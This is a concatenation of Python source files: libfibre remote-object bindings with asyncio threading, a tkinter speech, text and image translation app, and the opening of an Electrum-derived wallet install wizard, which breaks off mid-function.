    def _on_rx_completed(self, ctx, rx_stream, status, rx_end):
        # Completion callback invoked by libfibre. rx_end points one past the
        # last byte received; the difference to the buffer start gives the
        # number of bytes actually read.
        rx_start = cast(self._rx_buf, c_void_p).value
        n_read = rx_end - rx_start
        assert(n_read <= len(self._rx_buf))
        data = self._rx_buf[:n_read]
        future = self._future
        self._future = None
        self._rx_buf = None
        if status == kFibreClosed:
            self.is_closed = True
        if status == kFibreOk or status == kFibreClosed:
            future.set_result(data)
        else:
            future.set_exception(_get_exception(status))

    def read(self, n_read):
        """
        Reads up to the specified number of bytes from the stream.
        If more than zero bytes are requested, this function will either read at
        least one byte, set is_closed to True or throw an Exception (through the
        future).
        Currently only one read call may be active at a time (this may change
        in the future).
        Returns: A future that either completes with a buffer containing the
        bytes that were read or completes with an Exception.
        """
        assert(self._future is None)  # only one read may be in flight
        self._future = future = self._libfibre.loop.create_future()
        self._rx_buf = bytes(n_read)  # zero-filled receive buffer
        libfibre_start_rx(self._rx_stream_handle,
            cast(self._rx_buf, c_char_p), len(self._rx_buf),
            self._c_on_rx_completed, None)
        return future

    async def read_all(self, n_read):
        """
        Reads the specified number of bytes from the stream or throws an
        Exception.
        If zero bytes are requested, the underlying stream's read function
        is still called at least once.
        Returns: A future that either completes with a buffer of size n_read or
        an Exception.
        """
        data = bytes()
        while True:
            chunk = await self.read(n_read - len(data))
            data += chunk
            if n_read == len(data):
                break
            elif self.is_closed:
                raise EOFError()
            assert(len(chunk) > 0) # Ensure progress
        return data
class Call(object):
    """
    This call behaves as you would expect an async generator to behave. This is
    used to provide compatibility down to Python 3.5.
    """

    def __init__(self, func):
        self._func = func  # the RemoteFunction being invoked
        self._call_handle = c_void_p(0)  # filled in by libfibre_call
        self._is_started = False
        self._should_close = False
        self._is_closed = False
        self._tx_buf = None  # remaining bytes to transmit

    def __aiter__(self):
        return self

    async def asend(self, val):
        # First send must be None (async-generator protocol); subsequent
        # sends carry a (tx_buf, rx_len, should_close) tuple.
        assert(self._is_started == (not val is None))
        if not val is None:
            self._tx_buf, self._rx_len, self._should_close = val
        return await self.__anext__()

    async def __anext__(self):
        if not self._is_started:
            self._is_started = True
            return None # This immitates the weird starting behavior of Python 3.6+ async generators iterators
        if self._is_closed:
            raise StopAsyncIteration
        tx_end = c_void_p(0)
        rx_end = c_void_p(0)
        rx_buf = b'\0' * self._rx_len
        # Register this call so _on_call_completed can find it by ID.
        call_id = insert_with_new_id(self._func._libfibre._calls, self)
        status = libfibre_call(self._func._func_handle, byref(self._call_handle),
            kFibreClosed if self._should_close else kFibreOk,
            cast(self._tx_buf, c_char_p), len(self._tx_buf),
            cast(rx_buf, c_char_p), len(rx_buf),
            byref(tx_end), byref(rx_end), self._func._libfibre.c_on_call_completed, call_id)
        if status == kFibreBusy:
            # libfibre completes asynchronously; LibFibre._on_call_completed
            # resolves this future with (status, tx_end, rx_end).
            self.ag_await = self._func._libfibre.loop.create_future()
            status, tx_end, rx_end = await self.ag_await
            self.ag_await = None
        if status != kFibreOk and status != kFibreClosed:
            raise _get_exception(status)
        # NOTE(review): on the synchronous completion path tx_end/rx_end are
        # still c_void_p instances here, not plain ints — presumably
        # libfibre_call always returns kFibreBusy in practice; verify.
        n_written = tx_end - cast(self._tx_buf, c_void_p).value
        self._tx_buf = self._tx_buf[n_written:]
        n_read = rx_end - cast(rx_buf, c_void_p).value
        rx_buf = rx_buf[:n_read]
        if status != kFibreOk:
            self._is_closed = True
        return self._tx_buf, rx_buf, self._is_closed

    async def cancel():
        # NOTE(review): this method is broken as written — it is missing the
        # `self` parameter and references `call_id`, which is a local variable
        # of __anext__; invoking it will raise. Left unchanged pending the
        # author's TODO below.
        # TODO: this doesn't follow the official Python async generator protocol. Should implement aclose() instead.
        status = libfibre_call(self._func._func_handle, byref(self._call_handle), kFibreOk,
            0, 0, 0, 0, 0, 0, self._func._libfibre.c_on_call_completed, call_id)

    #async def aclose(self):
    #    assert(self._is_started and not self._is_closed)
    #    return self._tx_buf, rx_buf, self._is_closed
class RemoteFunction(object):
    """
    Represents a callable function that maps to a function call on a remote object.
    """

    def __init__(self, libfibre, func_handle, inputs, outputs):
        self._libfibre = libfibre
        self._func_handle = func_handle  # libfibre handle of the remote function
        self._inputs = inputs    # list of (name, codec_name, codec) for the arguments
        self._outputs = outputs  # list of (name, codec_name, codec) for the return values
        # Total number of bytes the remote function sends back.
        self._rx_size = sum(codec.get_length() for _, _, codec in self._outputs)

    async def async_call(self, args, cancellation_token):
        """Serialize *args*, drive the Call exchange, and decode the results."""
        #print("making call on " + hex(args[0]._obj_handle))
        tx_buf = bytes()
        for i, arg in enumerate(self._inputs):
            tx_buf += arg[2].serialize(self._libfibre, args[i])
        rx_buf = bytes()
        agen = Call(self)
        if not cancellation_token is None:
            cancellation_token.add_done_callback(agen.cancel)
        try:
            # Prime the generator (first asend must be None).
            assert(await agen.asend(None) is None)
            is_closed = False
            while not is_closed:
                # Push remaining TX bytes, request the missing RX bytes.
                tx_buf, rx_chunk, is_closed = await agen.asend((tx_buf, self._rx_size - len(rx_buf), True))
                rx_buf += rx_chunk
        finally:
            if not cancellation_token is None:
                cancellation_token.remove_done_callback(agen.cancel)
        assert(len(rx_buf) == self._rx_size)
        # Decode the concatenated output buffer into individual values.
        outputs = []
        for arg in self._outputs:
            arg_length = arg[2].get_length()
            outputs.append(arg[2].deserialize(self._libfibre, rx_buf[:arg_length]))
            rx_buf = rx_buf[arg_length:]
        if len(outputs) == 0:
            return
        elif len(outputs) == 1:
            return outputs[0]
        else:
            return tuple(outputs)

    def __call__(self, *args, cancellation_token = None):
        """
        Starts invoking the remote function. The first argument is usually a
        remote object.
        If this function is called from the Fibre thread then it is nonblocking
        and returns an asyncio.Future. If it is called from another thread then
        it blocks until the function completes and returns the result(s) of the
        invokation.
        """
        if threading.current_thread() != libfibre_thread:
            # Foreign thread: hop onto the fibre loop and block for the result.
            return run_coroutine_threadsafe(self._libfibre.loop, lambda: self.__call__(*args))
        if (len(self._inputs) != len(args)):
            raise TypeError("expected {} arguments but have {}".format(len(self._inputs), len(args)))
        coro = self.async_call(args, cancellation_token)
        return asyncio.ensure_future(coro, loop=self._libfibre.loop)

    def __get__(self, instance, owner):
        # Descriptor protocol: bind like a regular method when accessed on an
        # instance (so obj.func(...) implicitly passes obj).
        return MethodType(self, instance) if instance else self

    def _dump(self, name):
        """Return a human-readable signature string for this function."""
        print_arglist = lambda arglist: ", ".join("{}: {}".format(arg_name, codec_name) for arg_name, codec_name, codec in arglist)
        return "{}({}){}".format(name,
            print_arglist(self._inputs),
            "" if len(self._outputs) == 0 else
            " -> " + print_arglist(self._outputs) if len(self._outputs) == 1 else
            " -> (" + print_arglist(self._outputs) + ")")
class RemoteAttribute(object):
    """Descriptor that maps attribute access on a RemoteObject to libfibre.

    When magic_getter/magic_setter are set, the attribute is a
    fibre.Property<...> and reads/writes are transparently forwarded to the
    property object's read()/exchange() remote functions.
    """

    def __init__(self, libfibre, attr_handle, intf_handle, intf_name, magic_getter, magic_setter):
        self._libfibre = libfibre
        self._attr_handle = attr_handle  # libfibre handle of the attribute
        self._intf_handle = intf_handle  # libfibre handle of the attribute's interface
        self._intf_name = intf_name
        self._magic_getter = magic_getter
        self._magic_setter = magic_setter

    def _get_obj(self, instance):
        """Resolve this attribute on *instance* to a RemoteObject."""
        assert(not instance._obj_handle is None)
        obj_handle = c_void_p(0)
        status = libfibre_get_attribute(instance._obj_handle, self._attr_handle, byref(obj_handle))
        if status != kFibreOk:
            raise _get_exception(status)
        obj = self._libfibre._load_py_obj(obj_handle.value, self._intf_handle)
        if obj in instance._children:
            # Parent already holds a reference: drop the extra refcount.
            self._libfibre._release_py_obj(obj_handle.value)
        else:
            # the object will be released when the parent is released
            instance._children.add(obj)
        return obj

    def __get__(self, instance, owner):
        if not instance:
            return self
        if self._magic_getter:
            if threading.current_thread() == libfibre_thread:
                # read() behaves asynchronously when run on the fibre thread
                # which means it returns an awaitable which _must_ be awaited
                # (otherwise it's a bug). However hasattr(...) internally calls
                # __get__ and does not await the result. Thus the safest thing
                # is to just disallow __get__ from run as an async method.
                raise Exception("Cannot use magic getter on Fibre thread. Use _[prop_name]_propery.read() instead.")
            return self._get_obj(instance).read()
        else:
            return self._get_obj(instance)

    def __set__(self, instance, val):
        if self._magic_setter:
            # Forward the write to the property's exchange() remote function.
            return self._get_obj(instance).exchange(val)
        else:
            raise Exception("this attribute cannot be written to")
class RemoteObject(object):
    """
    Base class for interfaces of remote objects.

    Concrete subclasses are generated dynamically (see LibFibre._load_py_intf)
    and get their members populated from libfibre callbacks.
    """
    __sealed__ = False  # while False, __setattr__ allows new attributes

    def __init__(self, libfibre, obj_handle):
        # Class-level _refcount counts live instances of this generated
        # interface type; the instance-level _refcount mirrors libfibre's
        # internal refcount (maintained by LibFibre._load_py_obj/_release_py_obj).
        self.__class__._refcount += 1
        self._refcount = 0
        self._children = set()  # child objects resolved through attributes
        self._libfibre = libfibre
        self._obj_handle = obj_handle
        self._on_lost = concurrent.futures.Future() # TODO: maybe we can do this with conc
        # Ensure that assignments to undefined attributes raise an exception
        self.__sealed__ = True

    def __setattr__(self, key, value):
        if self.__sealed__ and not hasattr(self, key):
            raise AttributeError("Attribute {} not found".format(key))
        object.__setattr__(self, key, value)

    #def __del__(self):
    #    print("unref")
    #    libfibre_unref_obj(self._obj_handle)

    def _dump(self, indent, depth):
        """Recursively render this object's functions and attributes as text."""
        if self._obj_handle is None:
            return "[object lost]"
        try:
            if depth <= 0:
                return "..."
            lines = []
            for key in dir(self.__class__):
                if key.startswith('_'):
                    continue
                class_member = getattr(self.__class__, key)
                if isinstance(class_member, RemoteFunction):
                    lines.append(indent + class_member._dump(key))
                elif isinstance(class_member, RemoteAttribute):
                    val = getattr(self, key)
                    if isinstance(val, RemoteObject) and not class_member._magic_getter:
                        lines.append(indent + key + (": " if depth == 1 else ":\n") + val._dump(indent + " ", depth - 1))
                    else:
                        if isinstance(val, RemoteObject) and class_member._magic_getter:
                            val_str = get_user_name(val)
                        else:
                            val_str = str(val)
                        property_type = str(class_member._get_obj(self).__class__.read._outputs[0][1])
                        lines.append(indent + key + ": " + val_str + " (" + property_type + ")")
                else:
                    # NOTE(review): `val` is unbound on this branch unless a
                    # previous loop iteration assigned it; the resulting
                    # NameError is swallowed by the except below.
                    lines.append(indent + key + ": " + str(type(val)))
        except:
            # NOTE(review): bare except hides all errors (including bugs in
            # the loop above) behind a generic message.
            return "[failed to dump object]"
        return "\n".join(lines)

    def __str__(self):
        return self._dump("", depth=2)

    def __repr__(self):
        return self.__str__()

    def _destroy(self):
        """Detach from libfibre, release child objects and resolve _on_lost."""
        libfibre = self._libfibre
        on_lost = self._on_lost
        children = self._children
        # Clear instance state first so concurrent readers see "lost".
        self._libfibre = None
        self._obj_handle = None
        self._on_lost = None
        self._children = set()
        for child in children:
            libfibre._release_py_obj(child._obj_handle)
        # Drop the generated interface type once its last instance is gone.
        self.__class__._refcount -= 1
        if self.__class__._refcount == 0:
            libfibre.interfaces.pop(self.__class__._handle)
        on_lost.set_result(True)
class LibFibre():
    """Owns the libfibre context and bridges its C callbacks onto asyncio."""

    def __init__(self):
        self.loop = asyncio.get_event_loop()

        # We must keep a reference to these function objects so they don't get
        # garbage collected.
        self.c_post = PostSignature(self._post)
        self.c_register_event = RegisterEventSignature(self._register_event)
        self.c_deregister_event = DeregisterEventSignature(self._deregister_event)
        self.c_call_later = CallLaterSignature(self._call_later)
        self.c_cancel_timer = CancelTimerSignature(self._cancel_timer)
        self.c_on_found_object = OnFoundObjectSignature(self._on_found_object)
        self.c_on_lost_object = OnLostObjectSignature(self._on_lost_object)
        self.c_on_discovery_stopped = OnStoppedSignature(self._on_discovery_stopped)
        self.c_on_attribute_added = OnAttributeAddedSignature(self._on_attribute_added)
        self.c_on_attribute_removed = OnAttributeRemovedSignature(self._on_attribute_removed)
        self.c_on_function_added = OnFunctionAddedSignature(self._on_function_added)
        self.c_on_function_removed = OnFunctionRemovedSignature(self._on_function_removed)
        self.c_on_call_completed = OnCallCompletedSignature(self._on_call_completed)

        self.timer_map = {} # key: timer ID, value: asyncio timer handle
        self.eventfd_map = {} # key: event fd, value: registered event mask
        self.interfaces = {} # key: libfibre handle, value: python class
        self.discovery_processes = {} # key: ID, value: Discovery object
        self._objects = {} # key: libfibre handle, value: RemoteObject instance
        self._calls = {} # key: call ID, value: Call object

        # Hand libfibre an event-loop vtable backed by the asyncio loop.
        event_loop = LibFibreEventLoop()
        event_loop.post = self.c_post
        event_loop.register_event = self.c_register_event
        event_loop.deregister_event = self.c_deregister_event
        event_loop.call_later = self.c_call_later
        event_loop.cancel_timer = self.c_cancel_timer

        self.ctx = c_void_p(libfibre_open(event_loop))
        assert(self.ctx)

    def _post(self, callback, ctx):
        # libfibre callback: run `callback(ctx)` on the loop thread (callable
        # from any thread).
        self.loop.call_soon_threadsafe(callback, ctx)
        return 0

    def _register_event(self, event_fd, events, callback, ctx):
        # libfibre callback: watch event_fd for readability (mask bit 1)
        # and/or writability (mask bit 4).
        self.eventfd_map[event_fd] = events
        if (events & 1):
            self.loop.add_reader(event_fd, lambda x: callback(x, 1), ctx)
        if (events & 4):
            self.loop.add_writer(event_fd, lambda x: callback(x, 4), ctx)
        if (events & 0xfffffffa):
            raise Exception("unsupported event mask " + str(events))
        return 0

    def _deregister_event(self, event_fd):
        # Undo whatever _register_event installed for this fd.
        events = self.eventfd_map.pop(event_fd)
        if (events & 1):
            self.loop.remove_reader(event_fd)
        if (events & 4):
            self.loop.remove_writer(event_fd)
        return 0

    def _call_later(self, delay, callback, ctx):
        # libfibre callback: schedule a one-shot timer; returns its ID.
        timer_id = insert_with_new_id(self.timer_map, self.loop.call_later(delay, callback, ctx))
        return timer_id

    def _cancel_timer(self, timer_id):
        self.timer_map.pop(timer_id).cancel()
        return 0

    def _load_py_intf(self, name, intf_handle):
        """
        Creates a new python type for the specified libfibre interface handle or
        returns the existing python type if one was already create before.
        Behind the scenes the python type will react to future events coming
        from libfibre, such as functions/attributes being added/removed.
        """
        if intf_handle in self.interfaces:
            return self.interfaces[intf_handle]
        else:
            if name is None:
                name = "anonymous_interface_" + str(intf_handle)
            # Dynamically generate a RemoteObject subclass; its members are
            # populated by the subscription callbacks registered below.
            py_intf = self.interfaces[intf_handle] = type(name, (RemoteObject,), {'_handle': intf_handle, '_refcount': 0})
            #exit(1)
            libfibre_subscribe_to_interface(intf_handle, self.c_on_attribute_added, self.c_on_attribute_removed, self.c_on_function_added, self.c_on_function_removed, intf_handle)
            return py_intf

    def _load_py_obj(self, obj_handle, intf_handle):
        """Return (creating if needed) the RemoteObject for a libfibre handle."""
        if not obj_handle in self._objects:
            name = None # TODO: load from libfibre
            py_intf = self._load_py_intf(name, intf_handle)
            py_obj = py_intf(self, obj_handle)
            self._objects[obj_handle] = py_obj
        else:
            py_obj = self._objects[obj_handle]
        # Note: this refcount does not count the python references to the object
        # but rather mirrors the libfibre-internal refcount of the object. This
        # is so that we can destroy the Python object when libfibre releases it.
        py_obj._refcount += 1
        return py_obj

    def _release_py_obj(self, obj_handle):
        # Counterpart of _load_py_obj; destroys the object on the last release.
        py_obj = self._objects[obj_handle]
        py_obj._refcount -= 1
        if py_obj._refcount <= 0:
            self._objects.pop(obj_handle)
            py_obj._destroy()

    def _on_found_object(self, ctx, obj, intf):
        # Discovery callback: queue the new object on the Discovery identified
        # by ctx and wake its waiter by resolving the current future.
        py_obj = self._load_py_obj(obj, intf)
        discovery = self.discovery_processes[ctx]
        discovery._unannounced.append(py_obj)
        old_future = discovery._future
        discovery._future = self.loop.create_future()
        old_future.set_result(None)

    def _on_lost_object(self, ctx, obj):
        self._release_py_obj(obj)

    def _on_discovery_stopped(self, ctx, result):
        print("discovery stopped")

    def _on_attribute_added(self, ctx, attr, name, name_length, subintf, subintf_name, subintf_name_length):
        # ctx is the handle of the interface the attribute belongs to.
        name = string_at(name, name_length).decode('utf-8')
        subintf_name = None if subintf_name is None else string_at(subintf_name, subintf_name_length).decode('utf-8')
        intf = self.interfaces[ctx]
        # fibre.Property<...> attributes get transparent read access; readwrite
        # properties additionally get a magic setter.
        magic_getter = not subintf_name is None and subintf_name.startswith("fibre.Property<") and subintf_name.endswith(">")
        magic_setter = not subintf_name is None and subintf_name.startswith("fibre.Property<readwrite ") and subintf_name.endswith(">")
        setattr(intf, name, RemoteAttribute(self, attr, subintf, subintf_name, magic_getter, magic_setter))
        if magic_getter or magic_setter:
            # Also expose the raw property object under _<name>_property.
            setattr(intf, "_" + name + "_property", RemoteAttribute(self, attr, subintf, subintf_name, False, False))

    def _on_attribute_removed(self, ctx, attr):
        print("attribute removed") # TODO

    def _on_function_added(self, ctx, func, name, name_length, input_names, input_codecs, output_names, output_codecs):
        # Attach a RemoteFunction to the generated interface class.
        name = string_at(name, name_length).decode('utf-8')
        inputs = list(decode_arg_list(input_names, input_codecs))
        outputs = list(decode_arg_list(output_names, output_codecs))
        intf = self.interfaces[ctx]
        setattr(intf, name, RemoteFunction(self, func, inputs, outputs))

    def _on_function_removed(self, ctx, func):
        print("function removed") # TODO

    def _on_call_completed(self, ctx, status, tx_end, rx_end, tx_buf, tx_len, rx_buf, rx_len):
        # Completion of a libfibre_call that previously returned kFibreBusy;
        # resume the awaiting Call.__anext__ with the transfer results.
        call = self._calls.pop(ctx)
        call.ag_await.set_result((status, tx_end, rx_end))
        return kFibreBusy
class Discovery():
    """
    All public members of this class are thread-safe.
    """

    def __init__(self, domain):
        self._domain = domain
        self._id = 0  # key in libfibre.discovery_processes; set by _Domain._start_discovery
        self._discovery_handle = c_void_p(0)  # filled in by libfibre_start_discovery
        self._unannounced = []  # discovered objects not yet consumed by _next()
        self._future = domain._libfibre.loop.create_future()  # resolved when a new object arrives

    async def _next(self):
        """Return the next discovered object, waiting for one if necessary."""
        if len(self._unannounced) == 0:
            await self._future
        return self._unannounced.pop(0)

    def _stop(self):
        # Internal variant; must run on the libfibre thread.
        self._domain._libfibre.discovery_processes.pop(self._id)
        libfibre_stop_discovery(self._discovery_handle)
        # Cancel any pending _next() waiter.
        self._future.set_exception(asyncio.CancelledError())

    def stop(self):
        """Stop this discovery process (callable from any thread)."""
        if threading.current_thread() == libfibre_thread:
            self._stop()
        else:
            run_coroutine_threadsafe(self._domain._libfibre.loop, self._stop)
class _Domain():
    """
    All public members of this class are thread-safe.
    """

    def __init__(self, libfibre, handle):
        self._libfibre = libfibre
        self._domain_handle = handle  # libfibre handle of the open domain

    def _close(self):
        libfibre_close_domain(self._domain_handle)
        self._domain_handle = None
        #decrement_lib_refcount()

    def _start_discovery(self):
        """Start object discovery on this domain (libfibre thread only)."""
        discovery = Discovery(self)
        discovery._id = insert_with_new_id(self._libfibre.discovery_processes, discovery)
        libfibre_start_discovery(self._domain_handle, byref(discovery._discovery_handle), self._libfibre.c_on_found_object, self._libfibre.c_on_lost_object, self._libfibre.c_on_discovery_stopped, discovery._id)
        return discovery

    async def _discover_one(self):
        # Discover a single object, then immediately stop discovering.
        discovery = self._start_discovery()
        obj = await discovery._next()
        discovery._stop()
        return obj

    def discover_one(self):
        """
        Blocks until exactly one object is discovered.
        """
        return run_coroutine_threadsafe(self._libfibre.loop, self._discover_one)

    def run_discovery(self, callback):
        """
        Invokes `callback` for every object that is discovered. The callback is
        invoked on the libfibre thread and can be an asynchronous function.
        Returns a `Discovery` object on which `stop()` can be called to
        terminate the discovery.
        """
        discovery = run_coroutine_threadsafe(self._libfibre.loop, self._start_discovery)
        async def loop():
            while True:
                obj = await discovery._next()
                await callback(obj)
        self._libfibre.loop.call_soon_threadsafe(lambda: asyncio.ensure_future(loop()))
        return discovery
class Domain():
    """Context manager that opens a libfibre domain for a path specification.

    Keeps the libfibre thread alive (via the module refcount) for as long as
    the domain is open.
    """

    def __init__(self, path):
        increment_lib_refcount()
        self._opened_domain = run_coroutine_threadsafe(libfibre.loop, lambda: Domain._open(path))

    def _open(path):
        # Runs on the libfibre thread; called as a plain function (no self).
        assert(libfibre_thread == threading.current_thread())
        buf = path.encode('ascii')
        domain_handle = libfibre_open_domain(libfibre.ctx, buf, len(buf))
        return _Domain(libfibre, domain_handle)

    def __enter__(self):
        return self._opened_domain

    def __exit__(self, type, value, traceback):
        run_coroutine_threadsafe(self._opened_domain._libfibre.loop, self._opened_domain._close)
        self._opened_domain = None
        decrement_lib_refcount()
# Global LibFibre instance; created by the libfibre thread in _run_event_loop()
# and reset to None when that thread shuts down.
libfibre = None

def _run_event_loop():
    """Thread body of the libfibre thread.

    Creates the global LibFibre instance, runs the asyncio loop until
    terminate_libfibre resolves (see decrement_lib_refcount), then closes
    the libfibre context and tears down all remaining Python objects.
    """
    global libfibre
    global terminate_libfibre
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    terminate_libfibre = loop.create_future()
    libfibre = LibFibre()
    libfibre.loop.run_until_complete(terminate_libfibre)
    libfibre_close(libfibre.ctx)
    # Detach all objects that still exist
    # TODO: the proper way would be either of these
    #  - provide a libfibre function to destroy an object on-demand which we'd
    #    call before libfibre_close().
    #  - have libfibre_close() report the destruction of all objects
    while len(libfibre._objects):
        libfibre._objects.pop(list(libfibre._objects.keys())[0])._destroy()
    assert(len(libfibre.interfaces) == 0)
    libfibre = None
# Module-level state guarding the lifetime of the shared libfibre thread.
lock = threading.Lock()
libfibre_refcount = 0  # number of outstanding increment_lib_refcount() calls
libfibre_thread = None  # the thread running _run_event_loop, while refcount > 0
def increment_lib_refcount():
    """Bump the libfibre refcount, starting the libfibre thread on first use."""
    global libfibre_refcount
    global libfibre_thread
    with lock:
        libfibre_refcount += 1
        #print("inc refcount to {}".format(libfibre_refcount))
        if libfibre_refcount == 1:
            libfibre_thread = threading.Thread(target = _run_event_loop)
            libfibre_thread.start()
            # Busy-wait until the thread has published the global LibFibre
            # instance. NOTE(review): a threading.Event would avoid polling;
            # also the original indentation was lost — this wait is assumed to
            # belong to the thread-start branch, confirm against upstream.
            while libfibre is None:
                time.sleep(0.1)
def decrement_lib_refcount():
    """Drop one libfibre reference; stop and join the thread on the last one."""
    global libfibre_refcount
    global libfibre_thread
    with lock:
        #print("dec refcount from {}".format(libfibre_refcount))
        libfibre_refcount -= 1
        if libfibre_refcount == 0:
            # Ask the loop (from this foreign thread) to resolve the shutdown
            # future, which makes _run_event_loop exit.
            libfibre.loop.call_soon_threadsafe(lambda: terminate_libfibre.set_result(True))
            # It's unlikely that releasing fibre from a fibre callback is ok. If
            # there is a valid scenario for this then we can remove the assert.
            assert(libfibre_thread != threading.current_thread())
            libfibre_thread.join()
            libfibre_thread = None
def get_user_name(obj):
    """Return a user-facing display name for *obj*.

    This is a default placeholder implementation; applications may override
    this hook to supply meaningful names for their objects.
    """
    return "[anonymous object]"
|
translate.py | from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import languages
import threading
import pathlib
import speechTranslate as st
import textToSpeech as tts
import imageInterpreter as ii
# Records audio and inserts its translation into the textbox
def speechtranslate():
    """Record audio, translate it to the selected language, show the result.

    Runs on a worker thread (see listen()); the translate button's label is
    always restored, whether or not recording/translation succeeds.
    """
    try:
        targetLang = langVariable.get()
        translatedText = st.recordAudio(targetLang)
        textBox.insert(1.0, translatedText)
    except Exception:
        # Best-effort: recording/translation failures are deliberately
        # ignored (narrowed from a bare except so Ctrl-C still works).
        pass
    finally:
        # Single reset instead of the duplicated config() in both branches.
        translatebutton.config(text="Translate")
# Translates text into desired language
def texttranslate():
    """Translate the textbox contents into the selected language, in place."""
    # Renamed from `input`, which shadowed the builtin.
    source_text = textBox.get("1.0", END)
    lang = langVariable.get()
    result = st.translate(source_text, lang)
    textBox.delete('1.0', END)
    textBox.insert(1.0, result)
# Calls the speechtranslate while threading
def listen():
    """Clear the textbox and start speech translation on a worker thread."""
    textBox.delete('1.0', END)
    translatebutton.config(text="Listening...")
    # Run the (blocking) recording/translation off the Tk main loop.
    threading.Thread(target=speechtranslate).start()
# Changes text to speech
def speak():
    """Speak the textbox contents aloud in the selected language."""
    language = langVariable.get()
    text = textBox.get("1.0", END)
    # Text.get() always returns at least the trailing newline, so a length
    # of 1 means the box is empty — speak a translated placeholder instead.
    if len(text) == 1:
        text = st.translate("No text available", language)
    # Removed leftover debug output: print(type(text))
    tts.playAudio(language, text)
# Calls translate function upon language change
def change(event):
    """OptionMenu callback: re-translate the textbox when the language changes.

    *event* (the newly selected value) is unused; the current language is
    read back from langVariable inside texttranslate().
    """
    # The body was a line-for-line copy of texttranslate(); delegate instead.
    texttranslate()
# upload image function
def UploadAction(event=None):
    """Pick an image file, OCR it, translate the text and show the result."""
    filename = filedialog.askopenfilename()
    if not filename:
        # User cancelled the file dialog — nothing to do.
        return
    extracted = ii.getTextFromImage(filename)
    lang = langVariable.get()
    result = st.translate(extracted, lang)
    textBox.delete('1.0', END)
    textBox.insert(1.0, result)
#path of current file
path = pathlib.Path(__file__).parent.absolute()

#App icon image
filename = str(path) + '/images/image.png'

#Window components: fixed-size 400x500 dark window
window = Tk()
window.iconphoto(False, PhotoImage(file=filename))
window.title("Speech Translate")
window.geometry('400x500')
window.configure(background = "#161d25")
window.resizable(False, False)

#Body Frame (fills the window; propagation disabled to keep its fixed size)
frame = Frame(window,bg = "#161d25",width=400,height=500)
frame.grid(row=0,column=0,sticky="NW")
frame.grid_propagate(0)
frame.update()

# Available target languages for the dropdown.
OPTIONS = languages.getLanguages()

#Language dropdown; re-translates the textbox on selection (see change())
langVariable = StringVar(frame)
langVariable.set("english") # default value
languageOption = OptionMenu(frame, langVariable, *OPTIONS, command = change)
languageOption.place(x=200, y=20, anchor="center")
languageOption.config(bg = "#161d25",font=("Courier", 15),height = 10, width = 15)

#TextBox holding the text to translate / the translation result
textBox = Text(frame)
textBox.place(x=200, y=150, anchor="center")
textBox.config(font=("Courier", 15),height = 12,width = 40)

#Speech Translate Button (icon button; records audio via listen())
iconFile = str(path) + '/images/icon.png'
# Keep a module-level reference to the image so Tk doesn't drop it.
photo = PhotoImage(file = iconFile)
speechbutton = Button(frame, text="Speech Translate", image = photo , command=listen)
speechbutton.place(x=200, y=290, anchor="center")
speechbutton.config(fg = "#161d25",font=("Courier", 15),height = 50, width = 50)

#Text Translate Button
translatebutton = Button(frame, text="Translate", command=texttranslate)
translatebutton.place(x=120, y=350, anchor="center")
translatebutton.config(fg = "#161d25",font=("Courier", 15),height = 2, width = 16)

#Play Audio Button (text-to-speech of the textbox contents)
Audiobutton = Button(frame, text="Play Audio", command=speak)
Audiobutton.place(x=280, y=350, anchor="center")
Audiobutton.config(fg = "#161d25",font=("Courier", 15),height = 2, width = 16)

#Upload Image Button (OCR + translate)
imageButton = Button(frame, text="Image Upload", command=UploadAction)
imageButton.place(x=200, y=420, anchor="center")
imageButton.config(fg = "#161d25",font=("Courier", 15),height = 2, width = 16)

# Enter the Tk main loop (blocks until the window is closed).
window.mainloop()
installwizard.py |
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_bitcoinprivate import Wallet, WalletStorage
from electrum_bitcoinprivate.util import UserCancelled, InvalidPassword
from electrum_bitcoinprivate.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET
from electrum_bitcoinprivate.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
class GoBack(Exception):
    """Raised by wizard dialogs when the user presses the 'Back' button."""
    pass
# Prompt shown when asking the user to choose a wallet password.
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")

# Prompt shown when offering wallet-file encryption for hardware-device wallets.
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multisig configuration.

    Each cosigner gets one equal slice; the first ``m`` slices are drawn
    green (required signatures), the rest gray.
    """
    size = 120  # fixed square size of the widget in pixels

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m  # number of required signatures
        self.n = n  # total number of cosigners

    def set_n(self, n):
        """Set the total number of cosigners and repaint."""
        self.n = n
        self.update()

    def set_m(self, m):
        """Set the number of required signatures and repaint."""
        self.m = m
        self.update()

    def paintEvent(self, event):
        """Draw the pie: one slice per cosigner, green for the first m."""
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 7, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        # QPainter.drawPie expresses angles in 1/16th of a degree, so a full
        # circle is 16 * 360 units; each slice spans 1/n of the circle.
        for i in range(self.n):
            alpha = int(16* 360 * i/self.n)
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
def wizard_dialog(func):
    """Decorator for InstallWizard dialog methods.

    Updates the Back/Cancel button label, runs the wrapped dialog, and
    feeds its result into the ``run_next`` callback supplied by BaseWizard.
    ``GoBack`` navigates backwards (or closes the wizard at the first
    step); ``UserCancelled`` aborts quietly.
    """
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]
